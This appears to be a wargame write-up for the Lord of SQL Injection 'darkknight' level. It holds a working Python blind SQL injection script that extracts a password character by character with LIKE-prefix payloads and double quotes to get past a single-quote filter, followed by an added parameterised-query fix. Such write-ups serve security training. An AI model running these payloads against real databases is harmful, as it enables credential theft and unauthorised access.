  • [load of sql injection] darkknight
    webhacking/load of sql injection 2018. 11. 17. 02:12

    Solve code:

    Single quotes are filtered, but double quotes are not.

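    import requests

    url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"
    list1 = []

    cookies = { 'PHPSESSID' : 'uu98um35otu07audr4q491v6j3' }

    # Find the password length: the first i for which length(pw) < i holds
    # means the password is i-1 characters long.
    found = False
    for o in range(0,100):
        for i in range(1,10):
            text = "4"
            text1 = "4 || length(pw) < "+str(i)+" && length(no) < "+str(o)
            params = { 'pw' : text, 'no' : text1}
            res = requests.get( url, params = params, cookies = cookies )
            # Check every response, not only the last one of the inner loop
            if( 'Hello admin' in res.text ):
                print(res.text)
                found = True
                break
        if found:
            break

    # Recover the password one character at a time with a LIKE prefix match.
    # The pattern is wrapped in double quotes because single quotes are filtered.
    # LIKE is case-insensitive under a case-insensitive collation (MySQL's
    # default), so letters may come back in a different case than stored.
    for j in range(0, i-1):
        for k in range(ord('0'), ord('z')+1):  # '0' through 'z' inclusive
            text_main = "".join(list1)
            text = "4"
            text1 = '1 || pw Like "'+text_main+chr(k)+'%" -- '
            params = { 'pw' : text, 'no' : text1 }
            res = requests.get( url, params = params, cookies = cookies )
            if( 'Hello admin' in res.text):
                print(res.text)
                print(chr(k))
                list1.append(chr(k))
                break

    print("Solve == id : "+text_main+chr(k)+" no : "+str(o-1))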
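
Why the single-quote filter described above does not stop the injection, as an added example that is not part of the original post or the challenge's own code: the `no` value reaches the query as a bare number, so the fix is to validate and bind it rather than block characters. The table, rows and function names are constructed, and SQLite stands in for the challenge's MySQL (so `OR` is used where the script uses `||`).

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the challenge table; every row is made up.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT, pw TEXT, no INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("guest", "guest", 1), ("admin", "s3cr3t00", 2)])
    return db

def quote_filter(value):
    # Blocklist of the kind the post describes: only single quotes are rejected.
    if "'" in value:
        raise ValueError("single quote rejected")
    return value

def lookup_vulnerable(db, pw, no):
    # pw is placed inside quotes, but no is pasted in as a bare number, so
    # extra conditions can be appended without any quote character.
    sql = ("SELECT id FROM users WHERE id='guest' AND pw='%s' AND no=%s"
           % (quote_filter(pw), quote_filter(no)))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def lookup_hardened(db, pw, no):
    # Allowlist the numeric field, then bind both values as parameters so
    # neither can change the structure of the statement.
    if not re.fullmatch(r"[0-9]{1,9}", no):
        raise ValueError("no must be a decimal integer")
    row = db.execute(
        "SELECT id FROM users WHERE id='guest' AND pw=? AND no=?",
        (pw, int(no))).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    crafted = "0 OR no=2"  # constructed input, contains no quotes at all
    print("vulnerable:", lookup_vulnerable(db, "x", crafted))
    try:
        lookup_hardened(db, "x", crafted)
    except ValueError as exc:
        print("hardened:", exc)
```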

